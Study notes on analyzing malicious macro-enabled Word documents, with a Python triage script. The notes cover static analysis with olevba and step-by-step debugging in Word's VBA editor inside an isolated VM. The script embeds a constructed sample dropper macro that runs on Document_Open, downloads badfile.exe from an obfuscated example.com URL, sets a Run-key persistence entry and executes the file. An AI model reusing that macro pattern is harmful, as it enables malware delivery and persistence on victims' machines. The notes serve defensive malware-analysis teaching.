Analyzing Macro Code in Office Documents
Last updated
Tools Used:
oletools (olevba): a Python package for analyzing OLE and OpenXML Office files. Its olevba tool extracts the VBA source code from a document and prints a summary of auto-executing trigger points and suspicious keywords.
Microsoft Word: used to debug the macro step by step in the built-in VBA editor (the Developer tools / Visual Basic for Applications IDE).
Steps for Analyzing Macro-Enabled Documents:
Initial Setup:
Revert the VM snapshot, copy the course files into the analysis VM, and start Fakenet so that any network activity the macro generates is answered locally and logged instead of reaching the internet.
Open the command prompt in the folder where the sample document is located.
Static Analysis with OLEVBA:
Run olevba re_test_dlx.doc to analyze the document.
olevba prints the extracted VBA source of every macro module, followed by a summary table of findings that includes auto-execution trigger points such as Auto_Open and Document_Open.
Redirect the output to a text file for easier navigation: olevba re_test_dlx.doc > olevba_result.txt
Key Points to Analyze:
Focus on trigger points like Auto_Open and Document_Open: these subroutines run automatically when the document is opened, so they are where execution starts.
Inspect the code for calls such as MsgBox (displays a message), internet connections (for example HTTP request objects created with CreateObject), registry modifications, and file executions.
Understanding the Macro Code:
Analyze the flow of the macro:
In this sample the macro displays a message, connects to the internet, creates a registry entry, and finally executes a file.
Pay attention to the use of RegWrite (registry modification, a method of the WScript.Shell object) and Shell (command execution).
Look for obfuscation: here the macro routes its strings through a helper function named avg, which is a sign that strings are decoded or decrypted at runtime rather than stored in plain text. Expect URLs, registry paths, and file names to be hidden this way.
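The static triage above (trigger points, suspicious calls, strings rebuilt at runtime) can be automated over the VBA source that olevba extracts. The script below is an added example written for these notes; it is not part of the course material or of oletools. The macro in SAMPLE_VBA is a constructed sample that mirrors the behaviour described above (message box, HTTP GET, registry write, Shell); it is not the real re_test_dlx.doc macro, whose avg helper is not reproduced here. Instead the sample hides strings with Chr() and StrReverse(), two common VBA tricks, and the script undoes those. The optional load_macros helper uses the oletools VBA_Parser API (the library behind olevba) when a file path is given.

```python
"""Triage VBA source extracted by olevba: trigger points, suspicious calls,
and recovery of strings built at runtime with Chr()/StrReverse().

Added example for these notes, not course code and not part of oletools.
"""
import re
import sys

# Constructed sample (not the real re_test_dlx.doc macro): strings are hidden
# behind Chr() and StrReverse(), the kind of runtime string building to look for.
SAMPLE_VBA = '''Sub Document_Open()
    MsgBox "Compatibility check..."
    Dim u As String
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & StrReverse("moc.elpmaxe") & "/badfile.exe"
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", u, False
    http.Send
    Set ws = CreateObject("WScript.Shell")
    ws.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", "C:\\Users\\Public\\badfile.exe"
    Shell "C:\\Users\\Public\\badfile.exe", vbHide
End Sub
'''

# Word/Excel procedure names that run without any user action.
AUTO_TRIGGERS = {"auto_open", "autoopen", "document_open", "workbook_open",
                 "auto_close", "autoclose", "document_close", "workbook_close",
                 "autoexec", "autonew", "document_new"}
# Keywords worth a closer look; olevba's own list is much longer.
SUSPICIOUS = ("Shell", "RegWrite", "CreateObject", "WScript.Shell", "XMLHTTP",
              "ADODB.Stream", "SaveToFile", "Environ", "PowerShell", "MsgBox",
              "Chr", "StrReverse")

PROC_RE = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)', re.I)
CHR_RE = re.compile(r'\bChrW?\((\d+)\)', re.I)
STRREV_RE = re.compile(r'\bStrReverse\("([^"]*)"\)', re.I)
CONCAT_RE = re.compile(r'"([^"]*)"\s*[&+]\s*"([^"]*)"')
URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.I)
REG_RE = re.compile(r'\bHK(?:EY_[A-Z_]+|LM|CU|CR|U|CC)\\[^\s"]+')
PATH_RE = re.compile(r'\b[A-Za-z]:\\[^\s"]+')


def find_triggers(src):
    """Return [(procedure_name, line_number)] for auto-executing procedures."""
    hits = []
    for n, line in enumerate(src.splitlines(), 1):
        m = PROC_RE.match(line)
        if m and m.group(1).lower() in AUTO_TRIGGERS:
            hits.append((m.group(1), n))
    return hits


def find_suspicious(src):
    """Map each suspicious keyword that occurs to the line numbers it occurs on."""
    hits = {}
    for kw in SUSPICIOUS:
        pat = re.compile(r'\b' + re.escape(kw) + r'\b', re.I)
        lines = [n for n, line in enumerate(src.splitlines(), 1) if pat.search(line)]
        if lines:
            hits[kw] = lines
    return hits


def deobfuscate(src):
    """Fold Chr(n) calls and StrReverse("...") literals into plain string literals,
    then merge chains of literals joined by & or + until nothing changes.
    Limitation: a Chr(34) (a double quote) is emitted as VBA's "" escape and
    is not merged further; non-printable characters are emitted as-is."""
    out = CHR_RE.sub(lambda m: '"' + chr(int(m.group(1))).replace('"', '""') + '"', src)
    out = STRREV_RE.sub(lambda m: '"' + m.group(1)[::-1] + '"', out)
    while True:
        merged = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', out)
        if merged == out:
            return out
        out = merged


def extract_iocs(src):
    """Pull URLs, registry keys and Windows file paths out of (deobfuscated) source."""
    return {"urls": sorted(set(URL_RE.findall(src))),
            "registry_keys": sorted(set(REG_RE.findall(src))),
            "file_paths": sorted(set(PATH_RE.findall(src)))}


def load_macros(path):
    """Concatenate the VBA source of every macro module in an Office file using
    the oletools VBA_Parser API. Import is deferred so the rest of this script
    runs without oletools installed."""
    from oletools.olevba import VBA_Parser
    vp = VBA_Parser(path)
    chunks = []
    if vp.detect_vba_macros():
        for _, stream_path, vba_filename, vba_code in vp.extract_macros():
            chunks.append("' ---- %s (%s)\n%s" % (vba_filename, stream_path, vba_code))
    vp.close()
    return "\n".join(chunks)


if __name__ == "__main__":
    source = load_macros(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_VBA
    print("triggers:", find_triggers(source))
    print("suspicious:", find_suspicious(source))
    print("iocs:", extract_iocs(deobfuscate(source)))
```

Run it with no arguments to triage the embedded sample, or pass a document path (python triage.py re_test_dlx.doc, with oletools installed) to triage a real file. The deobfuscation step only handles string building that can be resolved without executing anything; a custom decoder like the avg function in the course sample still has to be understood in the debugger, as described in the next section.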
Dynamic Analysis with Microsoft Word:
Open the document in Microsoft Word (e.g., Word 2013) inside the analysis VM; do not enable macros yet.
Setting Breakpoints:
Use Alt + F11 to open the VBA editor.
Navigate to the Document_Open subroutine and insert an End statement (End is a VBA statement that halts execution, not a function) as its first line, so the macro stops before doing anything if it runs before you are ready.
Set a breakpoint at the first line of the subroutine.
Debugging:
Click Enable Content in Word to trigger the macro; only do this inside the isolated VM with Fakenet running. Execution halts at the breakpoint; comment out the End line (or skip it with Debug > Set Next Statement, Ctrl + F9) before continuing.
Return to the VBA editor and step through the code line by line with F8 (Step Into).
Use Shift + F8 (Step Over) to execute a decryption helper as a single step instead of stepping into it when its internals are not needed; it is still essential to understand the decryption algorithm, so step into it at least once.
Use the Watch Window (right-click a variable and choose Add Watch) to monitor variables and expressions, especially to observe decrypted strings as they are built and to record key indicators of compromise (IOCs) such as URLs, registry keys, and file paths.
Key Observations:
Identify network activity, such as HTTP GET requests and the URLs they target (Fakenet logs the request when the macro issues it).
Detect the creation of persistence mechanisms (e.g., writing to the registry).
Observe any execution of downloaded or created files, such as badfile.exe.
Summary:
olevba is used for static analysis, extracting the macro source and helping to identify key functions and trigger points within it.
Microsoft Word's VBA editor is essential for dynamic analysis, allowing step-by-step debugging to understand the macro's behavior fully.
Key techniques include setting breakpoints, stepping over (rather than into) decryption helpers once their algorithm is understood, and using the Watch Window to monitor variables and expressions.
These notes cover the fundamental steps and observations when analyzing macro-enabled Word documents for potential malicious activity.